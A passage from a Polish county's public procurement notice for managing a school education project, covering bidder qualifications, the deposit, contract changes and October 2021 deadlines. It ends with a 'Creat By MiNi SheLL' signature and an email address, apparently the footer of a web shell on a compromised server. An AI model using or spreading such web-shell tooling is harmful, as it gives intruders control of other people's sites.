ubiegających się o zamówienie.<br/>3.	Informacje zawarte w oświadczeniu, o którym mowa w ust. 1 potwierdza brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>5.	Podmiotowe środki dowodowe wymagane od wykonawcy obejmują również:<br/><br/>2)	Wykaz usług, wykonanych w okresie ostatnich 3 lat, a jeżeli okres wykazu dostaw lub usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy lub usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy; <br/>Wymaga się aby Wykonawca wykazał należyte wykonanie, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych w okresie ostatnich 3 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie– co najmniej 1 usługę, która polegała na zarządzaniu projektem edukacyjnym w którym uczestniczyło min. 80 osób, trwający przez ciągły okres co najmniej 18 miesięcy dofinansowanym ze środków pochodzących ze zorganizowanego programu<br/>Usługa wykazywana na potwierdzenie spełnienia powyższego warunku powinno być wykonana w ramach jednej umowy Zamawiający nie dopuszcza łączenia kilku usług z różnych kontraktów w celu zsumowania wielkości podanych w powyższych warunkach dla spełnienia warunku wyżej wymienionego. <br/>3)	Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami;<br/>Wymagane dysponowanie:<br/>Kierownik Projektu <br/>Koordynator/szkolny opiekun projektu (KSO) w Zespole Szkół Agrotechniczno-Ekonomicznych w Weryni	<br/>Koordynator/szkolny opiekun projektu (KSO) w Zespole Szkół Technicznych w Kolbuszowej.<br/>Waryunki dla powyzszych osób wskazano powyżej w pkt dot. warunków udziału w postępowaniu <br/>Zamawiający zastrzega, że jedna (ta sama) osoba, może być wykazywana w celu spełniania wymagań w nie więcej niż jednej roli.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) Dokumenty, z których wynika prawo do podpisania oferty; odpowiednie pełnomocnictwa<br/>(jeżeli dotyczy) tj . pełnomocnictwo do reprezentowania w postępowaniu wszystkich<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia - dotyczy ofert składanych<br/>przez podmioty wspólnie ubiegających się o udzielenie zamówienia; oraz pełnomocnictwo<br/>upoważniające do złożenia oferty - o ile ofertę składa pełnomocnik <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wadium w kwocie 3 500 zł<br/>2. Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących<br/>formach:<br/>1)pieniądzu;<br/>2)gwarancjach bankowych;<br/>3)gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z<br/>dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2020<br/>r. poz. 291).<br/>3. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia<br/>upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2<br/>i 3 oraz ust. 2 ustawy Pzp.<br/>4. Przedłużenie terminu związania ofertą jest dopuszczalne tylko z jednoczesnym przedłużeniem<br/>okresu ważności wadium albo, jeżeli nie jest to możliwe, z wniesieniem nowego wadium na<br/>przedłużony okres związania ofertą.<br/>5. Wadium wnoszone w formie pieniężnej wpłaca się przelewem na rachunek bankowy<br/>Zamawiającego: Nr 09 1240 1792 1111 0010 8529 4083<br/>6. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w ust. 2 pkt<br/>2-4 wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w postaci<br/>elektronicznej. Beneficjentem poręczenia lub gwarancji jest: Powiat Kolbuszowski ul.11<br/>Listopada 10 ,36-100 Kolbuszowa. Gwarancja przedkładana jako wadium w postępowaniu o<br/>zamówienie publiczne musi mieć postać gwarancji bezwarunkowej, tj. gwarancji na pierwsze<br/>żądanie. Gwarant/Poręczyciel w zapisach gwarancji/poręczenia musi zobowiązać się do<br/>zamawiającego, jeżeli wystąpią przesłanki do zatrzymania wadium, o których mowa w art. 98<br/>ust. 6 ustawy Jeżeli gwarant uzależni zapłatę sumy gwarancyjnej od dokonania czynności<br/>sprawdzających, które mają wykazać zasadność żądania beneficjenta (zamawiającego), to takie<br/>żądanie nie odpowiada wymogom co do jej bezwarunkowości. Gwarancja/poręczenia nie może<br/>również zawierać wymogu weryfikacji podpisów osób występujących w imieniu zamawiającego,<br/>tzw. klauzula złożenia żądania zapłaty kwoty wadium do gwaranta banku za pośrednictwem<br/>banku prowadzącego rachunek bankowy zamawiającego, który potwierdzi, że podpisy w<br/>oryginale widniejące na żądaniu zapłaty zostały złożone przez osoby uprawnione do<br/>reprezentowania zamawiającego.<br/>7. Wadium powinno zostać przekazane Zamawiającemu drogą komunikacji elektronicznej za<br/>pośrednictwem ePUAP przy użyciu systemu miniPortal, przed upływem terminu składania ofert<br/>(tj. przed upływem dnia i godziny wyznaczonej jako ostateczny termin składania ofert). Jeżeli<br/>Wykonawca przesyła wadium poza ofertą np. mailem powinno ono być oznaczone w sposób<br/>umożliwiający jednoznaczne zidentyfikowanie, którego postepowania dotyczy (przypisanie do<br/>postępowania).<br/>7. Zamawiający dokona zwrotu lub zatrzyma wadium zgodnie z zasadami określonymi w art. 98<br/>ustawy. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno<br/>być załączone do oferty. 2) W przypadku Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, oświadczenie, o którym mowa w Rozdziale VII ust.1 SWZ, składa każdy z<br/>wykonawców. Oświadczenie to potwierdza brak podstaw wykluczenia oraz spełnianie warunków<br/>udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu.<br/>3) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do<br/>oferty oświadczenie, o którym mowa w art.117 ust.4 ustawy Pzp z którego wynika, jaki zakres przedmiotu zamówienia wykonują poszczególni Wykonawcy.<br/>4) Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o zamówienie <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiana postanowień umowy (w tym w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy):<br/>1)	zmiana terminu realizacji przedmiotu zamówienia, w przypadku:<br/>a)	z powodu działania siły wyższej rozumianej jako epidemie, klęski żywiołowe, stany wyjątkowe, i inne których nie można było przewidzieć albo mimo możliwości przewidzenia nie można im było zapobiec uniemożliwiającej wykonanie usługi w określonym pierwotnie terminie o czas działania siły wyższej oraz potrzebny do usunięcia skutków tego działania, <br/>b)	wystąpienia okoliczności niezależnych od zamawiającego oraz wykonawcy <br/>c)	konieczności uzyskania decyzji, informacji niezbędnych do realizacji usługi lub uzgodnień, mogących spowodować wstrzymanie realizacji usługi- o czas niezbędny do uzyskania wymaganych decyzji, informacji bądź uzgodnień <br/>d)	konieczności zmiany harmonogramu realizacji projektu i finansowania uwarunkowanych prawidłową realizacja niniejszego projektu w tym wynikłego z aneksu z IŻ i inne<br/>e)	w trakcie realizacji zamówienia zostanie ujawniony błąd Zamawiającego (np. w szczegółowym opisie przedmiotu zamówienia) niemożliwy do zauważenia przez Wykonawców i Zamawiającego na etapie wyboru najkorzystniejszej oferty<br/>f)	przedłużenia/ skrócenia realizacji niniejszego projektu <br/><br/>2)	zmiana przedstawicieli stron, podmiotów biorących udział w zamówieniu- np. podwykonawców, osób reprezentujących strony, wykazanych realizatorów (osób) realizujących zadania projektu i innych przedstawicieli/podmiotów – w przypadku niemożności pełnienia przez nich powierzonych funkcji, realizacji zamówienia (np. zdarzenia losowe, zmiana pracy, rezygnacja itp). <br/>Zamawiający dopuszcza zmianę podwykonawcy lub rezygnację z udziału podwykonawcy przy realizacji przedmiotu zamówienia.<br/>W przypadku zmiany osób realizujących projekt Zamawiający dopuści zmianę pod warunkiem, że nowe podmioty /osoby wykażą spełnianie warunków w zakresie nie mniejszym niż wskazane na etapie postępowania o udzielenie zamówienia przez dotychczasowe podmioty/osób <br/>Jeżeli zmiana dotyczy podmiotu trzeciego, na zasobach, którego Wykonawca opierał się wykazując spełnianie warunków udziału w postępowaniu, Zamawiający dopuści zmianę pod warunkiem, że nowy podmiot wykaże spełnianie warunków w zakresie nie mniejszym niż wskazane na etapie postępowania o udzielenie zamówienia przez dotychczasowy podmiot. <br/><br/>3)	zmiana zakresu rzeczowego wykonana usług zmniejszenie/ zwiększenie zakresu)w przypadku:<br/>a)	zmiany sposobu realizacji niniejszego projektu <br/> c) rezygnacji z części zadań, jeśli taka rezygnacja będzie niezbędna do prawidłowej realizacji przedmiotu umowy i/lub prawidłowej realizacji projektu<br/>d) zmiany rodzaju, liczby usług/zadań realizowanych w ramach projektu jeśli będzie to niezbędne do prawidłowej realizacji przedmiotu umowy i/lub prawidłowej realizacji projektu<br/>d) w trakcie realizacji zamówienia zostanie ujawniony błąd Zamawiającego (np. w szczegółowym opisie przedmiotu zamówienia) niemożliwy do zauważenia przez Wykonawców i Zamawiającego na etapie wyboru najkorzystniejszej oferty<br/>4)	Wynagrodzenie wykonawcy określone w umowie może ulec zmianom w następujących przypadkach:<br/>4.1)	zmniejszenia zakresu rzeczowego zadań<br/>4.2) dopuszcza się zmianę wysokości wynagrodzenia należnego Wykonawcy, w formie pisemnego aneksu, w przypadku wystąpienia jednej z następujących okoliczności: <br/>a) zmiany stawki podatku od towarów i usług, <br/>b) zmiany wysokości minimalnego wynagrodzenia albo wysokości minimalnej stawki godzinowej ustalonych na podstawie przepisów o minimalnym wynagrodzeniu za pracę, <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-10-15 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub wniosku dostępnego na ePUAP i udostępnionego również na miniPortalu</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-10-15 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-11-13</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> cd zmiany umowy<br/>c) zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne, jeżeli zmiany te będą miały wpływ na koszty wykonania umowy przez Wykonawcę. <br/>A.	Zmiana wysokości wynagrodzenia w przypadku zaistnienia przesłanki, o której mowa w pkt 4.2 lit. a, będzie odnosić się wyłącznie do części przedmiotu umowy zrealizowanej, zgodnie z terminami ustalonymi umową, po dniu wejścia w życie przepisów zmieniających stawkę podatku od towarów i usług oraz wyłącznie do części przedmiotu umowy, do której zastosowanie znajdzie zmiana stawki podatku od towarów i usług.<br/>3.	W przypadku zmiany, o której mowa w pkt 4.2 lit a, wartość wynagrodzenia netto nie zmieni się, a wartość wynagrodzenia brutto zostanie wyliczona na podstawie nowych przepisów. <br/>4.	Zmiana wysokości wynagrodzenia w przypadku zaistnienia przesłanki, o której mowa w pkt 4.2 lit a lub b, będzie obejmować wyłącznie część wynagrodzenia należnego Wykonawcy, w odniesieniu do której nastąpiła zmiana wysokości kosztów wykonania umowy przez Wykonawcę w związku z wejściem w życie przepisów odpowiednio zmieniających wysokość minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej lub dokonujących zmian w zakresie zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub w zakresie wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne.<br/>5.	W przypadku zmiany, o której mowa w pkt 4.2 lit b, wynagrodzenie Wykonawcy ulegnie zmianie o kwotę odpowiadającą wzrostowi kosztu Wykonawcy w związku ze zwiększeniem wysokości wynagrodzeń osób wchodzących w skład zespołu Wykonawcy, do wysokości aktualnie obowiązującego minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, z uwzględnieniem wszystkich obciążeń publicznoprawnych od kwoty wzrostu minimalnego wynagrodzenia albo stawki godzinowej. Kwota odpowiadająca wzrostowi kosztu Wykonawcy będzie odnosić się wyłącznie do części wynagrodzenia osób świadczących usługi, o których mowa w zdaniu poprzedzającym, odpowiadającej zakresowi, w jakim wykonują oni prace bezpośrednio związane z realizacją przedmiotu umowy. <br/>6.	W przypadku zmiany, o której mowa w pkt 4.2 lit c, wynagrodzenie Wykonawcy ulegnie zmianie o kwotę odpowiadającą zmianie kosztu ponoszonego w związku z wypłatą wynagrodzenia osobom wchodzącym w skład zespołu Wykonawcy realizującego przedmiot umowy. Kwota odpowiadająca zmianie kosztu Wykonawcy będzie odnosić się wyłącznie do części wynagrodzenia osób realizujących przedmiot umowy, o których mowa w ust 5 odpowiadającej zakresowi, w jakim wykonują oni prace bezpośrednio związane z realizacją umowy.<br/>5)	zmiany zapisów umowy wynikające z wystąpienia oczywistych omyłek pisarskich i rachunkowych w treści umowy<br/>6) Zamawiający dopuszcza inne niż powyższe możliwości zmian treści zawartej umowy w następujących okolicznościach:<br/><br/>pozostałe zmiany umowy wskazano w siwz

Creat By MiNi SheLL
Email: jattceo@gmail.com